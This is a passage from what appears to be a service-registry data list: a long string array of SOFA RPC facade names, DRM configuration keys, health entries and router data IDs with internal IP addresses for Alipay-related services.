CE_ID#@#SOFA.DRM","com.alipay.intimateprod.common.service.facade.api.IntimateRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.booking.AdviceTradeAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.MerIndusPoolConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.biz.shared.resource.TaskTransferResource.filter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassistantmng.common.service.facade.api.ClusterInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:promoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.model.antworkbench.repository.AntBizParamRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.paramcenter.ParamCenterConfigOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.mordercenter.MocCorfirmGoodsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.process.JobEndTask:1.0:groovyScriptJobEndTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.userHomeMsgSorter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cpcenter.common.service.api.ServiceEventAtQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.66.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.katongprod.common.service.facade.message.KatongMessageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.after.InvestMajorIssueManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifccommon:name=com.alipay.fc.common.loadtest.drm.LoadTestMsgWhiteListControl.loadTestWhiteListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linkede.fabricsrv.rest.ReleaseRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.fc.process.common.service.facade.WTOperateTraceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.ipromomng.common.service.facade.api.campaign.P2PCampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.servie.facade.api.TairClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesync.common.service.facade.api.SyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publichome.common.service.facade.synchronize.SynchronizeArticleServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.DataRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofamesh.sofa4RpcMosnServer.facade.Sofa4RpcMosnServerSpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.productFieldConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.adaptor.sigma.SigmaChangeCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.sStandardCfgTbCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.common.service.facade.partner.role.EcologicalPartnerRoleOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INSTPORTAL#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cashierits.service.facade.ExecuteToolsService:1.0:executeToolsService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.acquirecenter.service.facade.api.OrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.18.116.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recruitcore.facade.biz.api.fundbudget.FundBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.appservice.AppServiceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.instradeprod.InsPolicyInstAcceptanceFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassettrade.fintradespi.spi.FinTradeCloseSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.datasync.StockAnnoucementSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seqa.common.service.facade.SampleRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sportsprod.common.service.facade.SportsAppAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.tmlife.TmLifeDynamicsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcache:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.ruleengine.service.ReAIServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mobileic#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.mybank.bkwirelessdataportal.common.service.panda.SchemeAuthManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbomp.common.service.facade.rutao.AlscActivityTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa4test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:offlineRefundAuditTimeoutHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.geofencing.ldc.GeofenceServiceInCZone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.NonStandardFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.speech.api.topic.TopicContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.serverless.api.VenueDeliverFacade:1.0:ucdpcore-venuemain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.api.RccenterUprcReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.verify.VerifyDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.account.AirUserProfileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.campaign.InsMktProdCampaignCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.dynamic.tradeapcore.tradeapcore_ds.doublewrite.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.AmActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditHbCreditPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.aistudio.facade.AiStudioModelMetaService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mservice.common.service.facade.api.workflow.WorkflowFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.scm.ScmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.revcore.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.UserStepCounterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mmtcaftscmdproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.api.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_os_partnerMenuService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.ProtocolVerifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_AUTHORIZY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instradeprod.common.service.inst.InsPolicyInstAcceptanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.trafficoperation.TrafficContentTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.159.206.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.coupon.service.OfflineServiceVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.ContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.210.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_C_INTIMATE_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finannafccore.common.service.facade.boss.FinTodoConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.defaultEncodeTestRunSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:jss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.PrizeBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.ChargeoffConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.iWFBizProdCommonCacheTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sandbox.common.service.facade.shadow.ShadowAcctransInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetGlobalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.widcsplatform.common.service.facade.api.userka.UserKaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimportal.common.service.InsClaimDataWorkManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.175.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.onShelveBlackFundCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.mobile.component.common.facade.mcop.FlowQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetdecision.common.service.facade.api.AssetVirtualTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.sofa.runtime.drm.log4j2LevelDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.monitor.MonitorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmrccore.common.service.facade.VideoContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.monitor.ModelMonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@revcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.emergencyExectTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.protocol-https:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bioperation.service.facade.api.TowerSystemConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitydataservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_BANK_BILL_MOCK_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opsconsole.facade.network.NetworkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.gpm.service.facade.GpmUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mobilecommunity.biz.community.drm.CommunityShareCfgResource.communityAuditConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocontent.common.service.facade.api.hzf.delivery.DeliveryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.ProgramAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.benefit.facade.account.BenefitAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.175.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.alarm.AlarmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileorderprod.service.api.mng.CrowdRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.firstLoanUserConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.huanyu.facade.core.engine.JzStageDriverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.product.service.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_APFUNDPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicy.service.feature.RtPolicyTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.237.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfoprod.common.service.company.facade.CompanyCategoryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.PlanServiceStressTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_1252#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.core.service.repository.FintradeOrderLmyhRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.CampaignDstRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:zskynet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mfinstockprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zpaascore.callback.DockerApiCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.DiagnosisViewQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mypointsgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.UserLoanCalcGatherProfitRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.model.service.RecommendService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.cif.facade.ProxyUserInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.openHomeOperatorFunctionBlackCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.80.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bpaas.trade.facade.basetrade.BuyerSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.ChannelMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.235.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.counter.api.CounterFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FengdieControlConfig.categoryParentId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.alipaypcard.api.AlipayPCardtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopBusinessInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuExpertDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MOBILEANTI#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TransferprodQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.171.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.querySaveMoneyAndCountBySum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.25.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.biz.dataview.spi.MerchantCertifyInfoSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.message.MessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.walle.service.facade.api.ReplayCaseFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.card.StockCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.connection.InsSceneBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.DataBaseOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BAOXIANVALUE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insopenprod.common.service.facade.api.outside.InsOutSideSceneApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.starWish4AntFarmGentleRecDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.common.service.facade.lisa.LisaIdentityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.transfercore.TransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.openplatform.facade.searchcomponent.api.SearchComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:registerTestAccountCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.PromiseMemberServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointmng.common.service.adjust.api.VouchercoreLogQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.chargefront.GoldenDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.task.rpc.facade.ProjectViewFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdataquery.bill.service.facade.adaptor.service.app.KbAppQueryProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.strategy.api.StrategyInfoCodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.QsStibFinanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.group.ShareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydatacore.common.service.facade.RiskCertificateQueryServiceForMng:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.service.facade.manage.VerifyProductManagerContextService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:salesmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.SimpleOrderOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.gateway.GatewaySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.notification.NotificationConfigurationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdadevicemonitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilesearchmng.service.MerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.zdatacontext.common.agent.drm.UniformAssertClientDRM.drMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:findecisionProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.InterfaceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.255.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.ptcore.common.service.facade.api.multilang.MultiLangConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.PayAuthSpiFacade:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.shopwifi.MobilelbsShopWifiInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.233.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:customscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.biz.shared.autodqc.D2DqcRuleManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unirelease.common.service.facade.UniReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcinspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alcorporation.common.service.facade.api.AffiRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ACCTRANS_LOADTEST_T#@#DEFAULT_INSTANCE_